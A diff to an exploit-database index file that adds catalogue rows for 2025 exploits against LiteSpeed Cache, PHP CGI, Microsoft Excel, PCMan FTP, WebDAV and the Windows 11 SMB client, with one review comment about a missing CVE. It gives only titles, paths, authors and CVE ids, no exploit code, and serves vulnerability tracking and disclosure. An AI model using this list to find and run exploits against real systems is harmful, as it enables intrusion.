 52099,exploits/php/webapps/52099.py,"Litespeed Cache 6.5.0.1 - Authentication Bypass",2025-03-28,"Caner Tercan",webapps,php,,2025-03-28,2025-04-13,0,CVE-2024-44000,,,,,
+52328,exploits/php/webapps/52328.py,"Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation",2025-06-15,"Milad karimi",webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-28000,,,,,
 11503,exploits/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,webapps,php,,2010-02-18,2010-08-31,1,OSVDB-62449,,,,http://www.exploit-db.comlsws-4.0.12-std-i386-linux.tar.gz,
 49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,,2021-02-05,2021-02-05,0,,,,,,
 25787,exploits/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",webapps,php,,2005-06-03,2013-05-28,1,,,,,,https://www.securityfocus.com/bid/13850/info
@@ -26362,6 +26366,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17309,exploits/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",webapps,php,,2011-05-20,2011-05-20,0,,,SOS-11-007.zip,,,http://www.senseofsecurity.com.au/advisories/SOS-11-007.pdf
 13747,exploits/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,webapps,php,,2010-06-05,,1,,,,,,
 11323,exploits/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",webapps,php,,2010-02-02,,1,OSVDB-62088;CVE-2010-0631,,,,,
+52331,exploits/php/webapps/52331.py,"PHP CGI Module 8.3.4 - Remote Code Execution (RCE)",2025-06-15,İbrahimsql,webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-4577,,,,,
 14425,exploits/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",webapps,php,,2010-07-20,2010-07-27,1,,,,,http://www.exploit-db.comphp_chat_for_123flashchat.zip,
 34078,exploits/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,webapps,php,,2010-06-02,2014-07-16,1,,,,,,https://www.securityfocus.com/bid/40532/info
 18210,exploits/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,webapps,php,,2011-12-07,2011-12-07,1,OSVDB-78091,,,,,
@@ -41052,6 +41057,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,local,windows,,2011-11-07,2011-11-07,1,CVE-2011-0105;OSVDB-71765;MS11-021,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-11-121/
 18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows,,2011-11-02,2011-11-02,1,MS11-021,,,,,
 40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,0,,,,,,
+52332,exploits/windows/local/52332.txt,"Microsoft Excel Use After Free - Local Code Execution",2025-06-15,nu11secur1ty,local,windows,,2025-06-15,2025-06-15,0,CVE-2025-27751,,,,,
 50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
 51212,exploits/windows/local/51212.txt,"Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path",2023-04-03,"Milad karimi",local,windows,,2023-04-03,2023-04-03,0,,,,,,
 50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
@@ -45191,9 +45197,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38013,exploits/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow",2015-08-29,Koby,remote,windows,21,2015-08-31,2016-10-31,1,CVE-2013-4730;OSVDB-94624,,,http://www.exploit-db.com/screenshots/idlt38500/38013.png,http://www.exploit-db.comPCMan.7z,
 40713,exploits/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Remote Buffer Overflow",2016-11-04,"Luis Noriega",remote,windows,,2016-11-04,2016-11-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-04-at-122818.png,http://www.exploit-db.comPCMan.7z,
 40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z,
+52326,exploits/windows/remote/52326.txt,"PCMan FTP Server 2.0.7 - Buffer Overflow",2025-06-15,"Fernando Mengali",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-4255,,,,,
 38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z,
 27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z,
-26471,exploits/windows/remote/26471.NA,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2025-06-13,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z,
@@ -45908,6 +45914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows,,2008-12-18,,1,OSVDB-50884;CVE-2008-5862,,,,,
 51765,exploits/windows/remote/51765.txt,"WebCatalog 48.4 - Arbitrary Protocol Execution",2024-02-02,ItsSixtyN3in,remote,windows,,2024-02-02,2024-02-02,0,,,,,,
 16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows,,2010-09-24,2011-03-10,1,,"Metasploit Framework (MSF)",,,,
+52334,exploits/windows/remote/52334.NA,"WebDAV Windows 10 - Remote Code Execution (RCE)",2025-06-15,"Dev Bui Hieu",remote,windows,,2025-06-15,2025-06-15,0,,,,,,
 3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080,2007-05-11,2016-09-29,1,OSVDB-40741;CVE-2007-2668,,,,http://www.exploit-db.comwebdesproxy-win32.tgz,
 37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow",2015-06-01,metacom,remote,windows,,2015-06-01,2016-03-08,1,,,,,,
 45695,exploits/windows/remote/45695.rb,"WebExec - (Authenticated) User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,,2018-10-25,2019-03-17,1,CVE-2018-15442,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/2ab9a003d40e436e2f1099d0d164b76a0c2d4d33/modules/exploits/windows/smb/webexec.rb
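Review bot: The new row for id 52334 leaves the CVE column empty, while the file it indexes (`exploits/windows/remote/52334.NA`, added earlier in this diff) declares `CVE: CVE-2025-33053` in its header; the row should carry that identifier so the entry can be found by CVE, as the neighbouring 52330 and 52332 rows do for theirs. The `.NA` extension recorded here is also at odds with the Python source that file contains, so the file name (and this path) should be settled before the index is updated.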
@@ -45957,6 +45964,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe,
 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
+52330,exploits/windows/remote/52330.py,"Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)",2025-06-15,"Mohammed Idrees Banyamer",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-33073,,,,,
 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
 52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,,
 52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,